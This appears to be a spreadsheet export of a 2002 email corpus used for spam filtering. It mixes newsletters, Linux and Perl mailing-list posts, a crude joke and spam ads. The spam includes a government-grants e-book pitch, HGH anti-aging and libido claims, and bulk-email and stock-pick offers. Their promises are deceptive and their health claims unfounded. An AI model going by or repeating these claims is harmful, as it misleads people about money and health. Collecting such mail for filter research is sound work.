                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6kpw1AX6CGLs-y39w-_lR" &gt;'Jaguar' may show its claws at MacWorld&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis and CNET News.com reporter Ian Fried talk about Jaguar, the anticipated update to Mac OS X and new, larger iMac flat-panel screens, both expected to be unveiled at this week's MacWorld.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZASFfmY0vIKlsTn8N_Jj9R" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWSgVacVQag_9-hwkp_WEcR"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href="http://clickthru.online.com/Click?q=78-d5asIdUDup1nLIr5vnMUN5xspoRR" &gt;
 Autodesk trims executive pay&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7notyXeOTLIiSupcptbPMPR" &gt;
 AMD to unveil chip amid earnings woes&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a2-6-M7QXZx3gbAbpH9R0CGk_HtsonR" &gt;
 Sun sends forth first version of Liberty&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8Jxs5lf2IJ0NpbnpTbdL3eR" &gt;
 Dow takes a beating as confidence wanes&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq5ab-RIX7qeZDozn6f5yR" &gt;
 U.S. government plans online ID gateway&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2EgmVsAyPhsYK3Awi9qlR" &gt;
 New entrants in search for low airfares&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f7-N0QnQLgzfYW2jQKlrZIGiR6ImOeR" &gt;
 U.S. says WorldCom books cooked in 2000&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=0c-_Y3DIc8H37kNJVXWDjP2qJ13b4yR" &gt;
 Qwest mulls bids for phone book unit&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdDDuryS_xoQqYoj1cTQ4lR" &gt;
 EarthLink uncorks broadband in Seattle&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiI4fXH-e2TMxvH3QainXQ4R" &gt;
 Liquid Audio rejects buyout offer&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUPLWwQARTP9VA35c54JMcR" &gt;
 Tech execs: Hands off P2P&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=60-oqItIsEAxTU70kBLN8S_eSgFWVRR" &gt;
 China threatens new Web penalties&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAMFv4QEB_rjups7LLZ5ZR" &gt;
 Are Mac users smarter?&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndGB5T02BO3Nt-tKChBwnR" &gt;
 Linux finds room on Wal-Mart shelves&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPHuvQaBYlcGhVIlcU_eR" &gt;
 Future fuzzy for Adobe camera software&lt;/a&gt;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href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1uGRsmpAqJzDxDXozLCyR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=ca-icPurXg7C8Y-yTfi_mKogQlfhTfm_sRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFh2XlPRIfbQq-Kh1XhaeR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0ska-wt2DkuUJ5QddfWmTyR"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href="http://clickthru.online.com/Click?q=09-joDSIj88OkFH6dzLYSS7ZMgtY8lR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWh9bcqMsqEsB8LE27qd4R" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjX0omHwTYz6yClxb-7XsrR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBsksaRyHMXl_kj2ZBSJuRR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQsg3gtKobvZm5yGKIaZR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKoFCR7UrqMtNXjoCKqdR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=88-ecGP-fKmi5IgSh-qQXN9j6TAZsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?Big5?B?rEKq96SjrE5+fqdPtsykRn5+?=
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY&gt;
 &lt;iframe align="center" marginwidth=0 marginheight=0 src="http://www.callin.net/20020827" frameborder=0 width=800 scrolling=no height=1700 name="ticker"&gt;&lt;/iframe&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: some (null) eyecandy packages
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multipart message in MIME format
 -----=_Next_Part_10878775_zmiO_mWTr_109818780
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: 8bit
 Content-Disposition: inline
 If anyone here is running (null) beta then you may like these Gnome theme packages.
 They are enhanced and repackages from my previous theme packs, this time to conform
 to the way pre-release RH8 handles themes for GTK1 and GTK2.
 RedHat has a preferences -&gt; themes app, but themes only show up there that have BOTH
 gtk1.2 (Gnome1) themes AND gtk1.4 (GTK2 aka Gnome2) themes available. Then RH will
 apply the theme to both GTK versions, so the user does not really notice that
 different GTK toolkit versions are being used, since they *should* look the same.
 This "gtk2-engines-compat" RPM has GTK2 ported themes for those themes that are
 included in the RH package "gtk-engines" themes pack for GTK1.
 The "gtk1+2-themez" pack mostly repackages my previous theme RPMs in a way that the
 (null) btea like, and supposedly the next RH8 when released :)
 forward - original mail:
   From " Angles  Puglisi" &lt;angles@aminvestments.com&gt;
   Date 09/01/2002 - 06:10:03 am
   Subject some (null) eyecandy packages
 -----=_Next_Part_10878775_zmiO_mWTr_109818780
 Content-Type: message/rfc822;
 Content-Disposition: inline
 Delivered-To: limbo-list@listman.spamassassin.taint.org
 X-Originating-IP: [207.172.11.147]
 From: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;
 To: limbo-list@spamassassin.taint.org
 Subject: some (null) eyecandy packages
 Message-ID: &lt;20020901.eak.70699000@www.dudex.net&gt;
 MIME-Version: 1.0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 8bit
 Content-Disposition: inline
 X-Mailer: AngleMail for phpGroupWare (http://www.phpgroupware.org) v 0.9.14.000
 X-Loop: limbo-list@spamassassin.taint.org
 Sender: limbo-list-admin@spamassassin.taint.org
 Errors-To: limbo-list-admin@spamassassin.taint.org
 X-BeenThere: limbo-list@spamassassin.taint.org
 X-Mailman-Version: 2.0.1
 Precedence: bulk
 Reply-To: limbo-list@spamassassin.taint.org
 List-Help: &lt;mailto:limbo-list-request@spamassassin.taint.org?subject=help&gt;
 List-Post: &lt;mailto:limbo-list@spamassassin.taint.org&gt;
 List-Subscribe: &lt;https://listman.spamassassin.taint.org/mailman/listinfo/limbo-list&gt;,
 	&lt;mailto:limbo-list-request@redhat.com?subject=subscribe&gt;
 List-Id: Discussion of the Red Hat Linux 'Limbo' beta &lt;limbo-list.spamassassin.taint.org&gt;
 List-Unsubscribe: &lt;https://listman.spamassassin.taint.org/mailman/listinfo/limbo-list&gt;,
 	&lt;mailto:limbo-list-request@redhat.com?subject=unsubscribe&gt;
 List-Archive: &lt;https://listman.spamassassin.taint.org/pipermail/limbo-list/&gt;
 Date: Sun, 01 Sep 2002 10:01:54 +0000
 I make these for myself, you may find them of interest. See the .spec file(s) for info.
 http://www.dudex.net/rpms/gtk2-engines-compat-1.0-aap1.noarch.rpm
 http://www.dudex.net/rpms/gtk2-engines-compat-1.0.spec
 http://www.dudex.net/rpms/gtk1+2-themez-1.1-aap1.noarch.rpm
 http://www.dudex.net/rpms/gtk1+2-themez-1.1.spec
 You'll need gtk-engines, gtk2-engines, and a "thinice" engine for gtk2, this one
 might be a old now but it works:
 http://www.dudex.net/rpms/gtk2-thinice-engine-2.0.1-2.i386.rpm
 http://www.dudex.net/rpms/gtk2-thinice-engine-2.0.1-2.src.rpm
 http://www.dudex.net/rpms/gtk2-thinice-engine-2.0.1.spec
 --
 That's "angle" as in geometry.
 _______________________________________________
 Limbo-list mailing list
 Limbo-list@redhat.com
 -----=_Next_Part_10878775_zmiO_mWTr_109818780--
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: QOTD: Cigarettes, fast food, beer.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 Forwarded-by: Mike Olson &lt;mao@olsons.net&gt;
 Forwarded-by: Jim Frew &lt;frew@icess.ucsb.edu&gt;
 Forwarded-by: "Mark Mooney" &lt;shadow.dweller@verizon.net&gt;
 From: the "Vent", Scottsdale Tribune:
 First they sue the tobacco companies for giving them lung cancer,
 then the fast food places for making them fat.
 Guess I can sue Budweiser for all the ugly women I've slept with.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-01
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Perl Ports Page
 +--------------------------------------------------------------------+
 | Perl Ports Page                                                    |
 |   posted by hfb on Saturday August 31, @13:40 (cpan)               |
 |   http://use.perl.org/article.pl?sid=02/08/31/1744247              |
 +--------------------------------------------------------------------+
 [0]jhi writes " One of the largely unknown services of CPAN is the
 [1]Ports page, which offers links to ready-packaged binary distributions
 of Perl for various platforms, and also other related links (to other
 UNIXy software, if the platform isn't, and to IDEs and editors). I would
 like to get feedback on the ports page either here or by sending email to
 cpan@perl.org. Any kind of feedback is welcome, but I will feel free to
 ignore any I don't like :-)"
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/31/1744247
 Links:
     0. mailto:jhi@iki.fi
     1. http://www.cpan.org/ports/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</si>
  <si>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FREE TRIAL - Last Stock pick UP 309%................................................. cqhcp
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="center"&gt;&lt;font style="font-size: 11pt" face="Courier"&gt;Special Offer - FREE TRIAL&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;a href="http://www.globalcybercollective.com/WSB_FreeTrialOffer.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;img border="0" src="http://www.globalcybercollective.com/WSBulletinEmail5.bmp"&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="2"&gt;I'm not interested &lt;a href="mailto:takemeoff1001@themail.com?subject=takeoff"&gt;&lt;b&gt;click here&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 sajfdibpjnjppmhbymschktbn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Teen dies of starvation after stepfather puts him on a bus and
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8268029,1717/
 Date: 2002-09-26T08:22:40+01:00
 [IMG: http://www.newsisfree.com/Images/fark/azcentral.gif ([AZCentral])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hello katfish48 ! WOULD A GRANT HELP YOU?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;hr width = "100%"&gt;
 &lt;center&gt;&lt;font size = "+2" color = "#44C300"&gt;&lt;b&gt;Government Grants E-Book 2002 edition&lt;/font&gt;&lt;/b&gt;&lt;p&gt;
 &lt;table&gt;&lt;Tr&gt;&lt;td&gt; 
 &lt;li&gt;katfish48!  You Can Receive The &lt;font color = "green"&gt;&lt;b&gt;Money&lt;/b&gt;&lt;/font&gt; You Need...
 &lt;li&gt;Every day &lt;b&gt;&lt;font color = "green"&gt;millions of dollars&lt;/font&gt;&lt;/b&gt; are given away to people, just like you!!
 &lt;li&gt;Your Government spends &lt;b&gt;&lt;font color = "green"&gt;billions&lt;/font&gt;&lt;/b&gt; of tax dollars on government grants.
 &lt;li&gt;Do you know that private foundations, trust and corporations are
 &lt;li&gt;required to give away a portion of theirs assets. It doesn't matter,
 &lt;li&gt;where you live (USA ONLY), your employment status, or if you are broke, retired
 &lt;li&gt;or living on a fixed income. There may be a grant for you!
 &lt;hr width = "100%"&gt;
 &lt;li&gt;&lt;font color = "red"&gt;&lt;b&gt;ANYONE&lt;/b&gt;&lt;/font&gt; can apply for a Grant from 18 years old and up!
 &lt;li&gt;We will show you HOW &amp; WHERE to get Grants. &lt;font color = "red"&gt;&lt;b&gt;THIS BOOK IS NEWLY UPDATED WITH THE MOST CURRENT INFORMATION!!!&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;Grants from $500.00 to $50,000.00 are possible!
 &lt;li&gt;GRANTS don't have to be paid back, EVER!
 &lt;li&gt;Grants can be ideal for people who are or were bankrupt or just have bad credit.
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;br&gt;&lt;font size = "+1"&gt;Please Visit Our Website&lt;p&gt;&lt;/font&gt;
 And Place Your &lt;font color = "red"&gt; &lt;b&gt;Order TODAY!&lt;/b&gt; &lt;/font&gt;&lt;a href = "http://www153.wiildaccess.com/"&gt;&lt;b&gt;&lt;font size="5"&gt;CLICK HERE&lt;/font&gt;&lt;/b&gt; &lt;/a&gt;&lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;font size="1"&gt;
 We apologize for any email you may have inadvertently received.&lt;br&gt;
 Please &lt;a href = "http://www153.wiildaccess.com/remove.htm"&gt;CLICK HERE&lt;/a&gt; to be removed from future mailings.&lt;/font&gt;&lt;br&gt;
  [BFRYTE^3247(^(PO1:K]
</t>
  </si>
  <si>
    <t xml:space="preserve">Heh. Never mind the perfectly good desert in the southwest, right? Or is 
 that area too hot for desert warfare training? I'll never understand.
 E
 CDale wrote:
 &gt;Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of 
 &gt;acres of virgin pine forest that was razed here in MS so that our military 
 &gt;can practice desert warfare?  Fought it for years, lost, now there is a 
 &gt;stand of trees up and down Hwy 49 that's supposed to try to hide the fact 
 &gt;that a huge portion of the Desoto Ntl. Forest is gone.
 &gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Randy Moss smokes ganja
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390121,1717/
 Date: 2002-09-30T11:09:21+01:00
 [IMG: http://www.newsisfree.com/Images/fark/yahoonews.gif ([Yahoo])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Reliability of the razor servers?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C23C65.5AE1B4E0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 ok so after waiting all this time before upgrading to V2 (just did it =
 this morning because V1 isn't effective at all anymore) i ran into =
 problems with reliability of the servers. it took me about half an hour =
 to do a razor-admin -create and razor-admin -register constantly =
 retrying because it kept timing out
 connect1: nextserver: Could not get valid info from Discovery Servers
 is it a problem just now or is that standard issue? up until now i've =
 been advocating razor to all, but i it starts to have reliability issues =
 we might as well look for another way to catch the spam, we can't afford =
 to have one anti spam trick, no matter how effective, bog down the =
 entire mail server
 --
 Daniel Higgins
 Netcommunications Inc.
 ------=_NextPart_000_0007_01C23C65.5AE1B4E0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content=3D"text/html; charset=3Diso-8859-1" =
 http-equiv=3DContent-Type&gt;
 &lt;META content=3D"MSHTML 5.00.2920.0" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;ok so after waiting all this time =
 before upgrading=20
 to V2 (just did it this morning because V1 isn't effective at all =
 anymore) i ran=20
 into problems with reliability of the servers. it took me about half an =
 hour to=20
 do a razor-admin -create and razor-admin -register constantly retrying =
 because=20
 it kept timing out&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;connect1: nextserver: Could not get =
 valid info from=20
 Discovery Servers&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;is it a problem just now or is that =
 standard issue?=20
 up until now i've been advocating razor to all, but i it starts to have=20
 reliability issues we might as well look for another way to catch the =
 spam, we=20
 can't afford to have one anti spam trick, no matter how effective, bog =
 down the=20
 entire mail server&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;--&lt;BR&gt;Daniel =
 Higgins&lt;BR&gt;Netcommunications=20
 Inc.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0007_01C23C65.5AE1B4E0--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get one million emails sent free for your company
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have a product or service to offer?
 Would you like to reach Hundreds of Thousands of clients?
 Want more sales or leads?
 If you own or operate a business then you must have 
 said yes to one of these questions. We are a Bulk 
 Email Company.
 We can get your message out to the masses. Fast, 
 Affordable, Effective direct emailing services is what 
 we offer. We specialize in getting  you more sales, leads, 
 phone calls, emails and clients.
 We can send out Explosive Email Creatives or Simple 
 Text (like this ad). We have been in this business for 
 over 6 years. We know what it takes to get you the 
 business and response rate you deserve.
 Contact us today for more infomation on our services. 
 24 Hour Special Buy One Million Email Blast
 Get One Million Free! (New Clients Only)
 General Delivery.
 Contact Us: 1-248-708-6158
 Call anytime for a fee quote or information. 
 Targeted lists in stock.
 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
 If you have received this message in error and would
 like to be removed from future mailings, please send and
 email to removal1@btamail.net.cn with your email
 address in the subject.. Please do not complain to
 our removal box's host, it will only prevent others from
 being able to be removed.
 _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
</t>
  </si>
  <si>
    <t xml:space="preserve">A true geek.  Runs to the puter to post before taking a laboring wife to 
 the hospital.  I'd kill you.  LOL
 Grats, Daddy-o!
 C
 On Sat, 27 Jul 2002, Tom wrote:
 &gt; 
 &gt; Off we go to the hospital
 &gt; 
 &gt; Benjamin Wallace Higgins is on his way.
 &gt; 
 &gt; -tom
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 -- 
 "My theology, briefly, is that the universe was dictated but not
           signed."  (Christopher Morley) 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Before we get too far down this road, what do people think of creating a
 spambayes package containing classifier and tokenizer?  This is just to
 minimize clutter in site-packages.
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:
 &gt; Sounds a lot like TMDA to me. :( Filing date is July 26, 2001,
 &gt; granted May 16, 2002.
 &gt;
 &gt; TMDAers, have you seen this before?
 No, but thanks for pointing it out.
 &gt; I'd presume TMDA is prior art, but still, it could be troublesome...
 Yup.  TMDA's core functionality was fully established before even the
 filing date.
 Anyone with experience in this area have a recommendation on whether
 this should be pursued or not?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ray Ozzie: "How long before we see auto pingback generator spambots?"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:49:00AM
 Date: Wed, 25 Sep 2002 12:49:00 GMT
 Ray Ozzie[1]: "How long before we see auto pingback generator spambots?"
 [1] http://www.ozzie.net/blog/2002/09/25.html#a65
</t>
  </si>
  <si>
    <t xml:space="preserve">I use gnome here on half a dozen sunray 150 boxen. Been trying to get linux
 on them for along time with mixed results.. Has anyone succeeded in this?
 &gt; -&gt; It does work on SunRays. Just install it normally on the 
 &gt; server, the sun 
 &gt; install will make the necessary changes to the dtlogin screen 
 &gt; and you can just 
 &gt; select gnome from there. AFAIK you can do this for any window 
 &gt; manager. But I 
 &gt; don't admin sunray servers so I'm not fully aware of the 
 &gt; issues or exact 
 &gt; requirements.
 &gt; 
 &gt; Cheers,
 &gt; ~Al
 &gt; 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NY Times piece on reporters with weblogs.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:24:12AM
 Date: Mon, 23 Sep 2002 15:24:12 GMT
 NY Times piece[1] on reporters with weblogs.
 [1] http://www.nytimes.com/2002/09/23/technology/23BLOG.html?ex=1033358400&amp;en=a34d8a401c775a55&amp;ei=5007&amp;partner=USERLAND
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; There are so many good musician jokes.
 Young Lutheran's Guide To The Orchestra
 Cheers,
 Wayne
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toy otaku heaven
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534186
 Date: Not supplied
 SweatyFrog is a toy-review magazine/store, focusing on collectible toys with 
 great, MegoSteve[1]-style erudite toy-otaku commentary. Toy_Design_Guru, who 
 suggested the link, recommends their occassional email newsletter as a 
 must-read. Link[2] Discuss[3] (_Thanks, Toy_Design_Guru!_)
 [1] http://www.megosteve.com
 [2] http://www.sweatyfrog.com/index2.html
 [3] http://www.quicktopic.com/boing/H/WhGgH4sXeVwJN
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW: Look and Feel 10-20 years younger             CAU
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;
 &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font size=3D"3" face=3D"Arial"&gt;
 Lose weight while building lean muscle mass&lt;br&gt;
 &amp;nbsp;and reversing the signs of aging all at once.&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font size=3D"3" face=3D"Arial"&gt;&lt;br&gt;Remarkable discoveries abou=
 t Human Growth Hormones (HGH) &lt;br&gt;
 are changing the way we think about aging and weight loss.&lt;/font&gt;&lt;/p&gt;
 &lt;div align=3D"left"&gt;&lt;left&gt;&lt;table width=3D"442"&gt;&lt;tr&gt;&lt;td height=3D"2" width=3D=
 "229"&gt;
 &lt;p align=3D"left"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"3"&gt;&lt;=
 b&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Lose Weight&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Build Muscle Tone&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Reverse Aging&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Increased Libido&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Duration Of Penile Erection&lt;br&gt;
 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height=3D"2" width=3D"199"&gt;
 &lt;p align=3D"left"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"3"&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;&lt;b&gt;Healthier Bones&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Improved Memory&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Improved skin&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;New Hair Growth&lt;br&gt;
 &lt;img height=3D"22" src=3D"http://freesite002.friendly-hosting.com/arrow.gi=
 f" width=3D"19" align=3D"textTop"&gt;Wrinkle Disappearance
 &lt;/b&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/left&gt;&lt;/div&gt;
